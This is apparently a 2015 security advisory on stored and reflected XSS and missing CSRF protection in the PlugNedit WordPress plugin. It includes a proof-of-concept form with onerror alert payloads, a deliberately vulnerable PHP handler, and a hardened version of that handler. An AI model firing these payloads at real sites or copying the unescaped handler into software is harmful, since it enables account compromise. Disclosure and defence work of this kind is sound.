Subject: Persistent Cross-Site Scripting (XSS) in PlugNedit Adaptive Editor 5.2.0
Date: Tue, 25 Aug 2015 13:15:15 +0200

Hello,

Plugin: PlugNedit Adaptive Editor 5.2.0 https://wordpress.org/plugins/plugnedit/

1. Persistent and Reflected Cross-Site Scripting (XSS)

Authenticated users (even low-privileged ones such as subscribers) can store or inject HTML/JS code; the request is also not protected against CSRF.

Method: POST
Url: http://localhost/wp-admin/admin-ajax.php?action=simple_fields_field_type_post_dialog_load
Vulnerable parameters for reflected: PlugneditBGColor, PlugneditEditorMargin, plugneditcontent
Vulnerable parameters for persistent (stored in plugin options): plugnedit_width, pnemedcount, etc.

Example PHP callstack:
PnEPageBuilder   [/plugnedit/pagebuilder.php:444]

Verification (some reflected, some persistent):
--
<form method="POST" action="http://localhost/wp-admin/admin.php?page=plugnedit%2Fpagebuilder.php">
<input type="text" name="PlugneditBGColor" value='"><img src=x onerror=alert(1) />' />
<input type="text" name="PlugneditEditorMargin" value='"><img src=x onerror=alert(2) />' />
<input type="text" name="plugnedit_width" value='"><img src=x onerror=alert(4) />' />
<input type="text" name="pnemedcount" value='"><img src=x onerror=alert(5) />' />
<input type="submit" name="submit" />
</form>
--
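For reference, here is an added illustration (not the plugin's own code) of the handler pattern the advisory describes beside a hardened version: a CSRF nonce check, a capability check that subscribers fail, input validation before the value is stored, and escaping at output. Function and option names (pne_save_settings_*, plugnedit_bgcolor, pne_nonce) are assumptions.

```php
<?php
// Added illustration, not code from the PlugNedit plugin. Function and option
// names below are assumptions; the WordPress API calls are real.

// Pattern described in the advisory: POSTed values are echoed into the page
// (reflected) and written to plugin options (persistent) with no nonce,
// no capability check and no escaping.
function pne_save_settings_vulnerable() {
    $bg = $_POST['PlugneditBGColor'];
    update_option('plugnedit_width', $_POST['plugnedit_width']); // stored as-is
    echo '<div style="background:' . $bg . '">';                   // reflected as-is
}

// Hardened form of the same handler.
function pne_save_settings_hardened() {
    // Subscribers do not have manage_options, so the request is rejected early.
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions', '', array('response' => 403));
    }
    // Rejects requests that do not carry a valid nonce (CSRF protection).
    check_admin_referer('pne_save_settings', 'pne_nonce');

    // Validate against the expected shape instead of accepting free text:
    // the colour must be a CSS hex value, the width a non-negative integer.
    $bg = isset($_POST['PlugneditBGColor']) ? trim($_POST['PlugneditBGColor']) : '';
    if (!preg_match('/^#[0-9a-fA-F]{6}$/', $bg)) {
        $bg = '#ffffff';
    }
    $width = absint($_POST['plugnedit_width'] ?? 0);

    update_option('plugnedit_bgcolor', $bg);
    update_option('plugnedit_width', $width);

    // Escape at output even though the value was validated; the two
    // controls are independent and each covers the other's failure.
    echo '<div style="background:' . esc_attr($bg) . '">';
}

// The settings form must emit the matching nonce field, and stored values
// are escaped when reflected back into attributes.
function pne_settings_form() {
    $action = admin_url('admin.php?page=plugnedit%2Fpagebuilder.php');
    echo '<form method="post" action="' . esc_url($action) . '">';
    wp_nonce_field('pne_save_settings', 'pne_nonce');
    echo '<input type="text" name="PlugneditBGColor" value="'
        . esc_attr(get_option('plugnedit_bgcolor', '#ffffff')) . '">';
    echo '<input type="number" name="plugnedit_width" value="'
        . esc_attr(get_option('plugnedit_width', 0)) . '">';
    echo '<input type="submit" name="submit" value="Save"></form>';
}
```

With the hardened handler in place, the verification form above fails the nonce check before any value is stored or echoed.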

Other possible XSS:
do_pPlugnedit   [/plugnedit/PNEBlogBuilder.php:247]
do_pPlugnedit   [/plugnedit/PNEBlogBuilder.php:271]


--
Regards,
Marcin Probola